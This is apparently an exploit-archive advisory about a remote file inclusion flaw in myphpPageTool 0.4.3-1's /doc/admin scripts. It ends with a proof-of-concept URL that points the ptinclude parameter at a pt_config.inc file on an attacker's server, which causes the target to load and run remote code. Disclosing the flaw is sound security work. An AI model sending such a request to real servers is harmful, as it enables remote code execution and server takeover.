myphpPageTool 0.4.3-1 - Remote File Inclusion



EKU-ID: 27697 CVE: OSVDB-ID:
Author: frog Published: 2003-02-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/6744/info

myphpPageTool is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in several PHP script files in the /doc/admin folder.

Under some circumstances, it is possible for remote attackers to influence the include path for 'pt_config.inc' to point to an external file on a remote server by manipulating some URI parameters.

http://[target]/doc/admin/index.php?ptinclude=http://[attacker]/pt_config.inc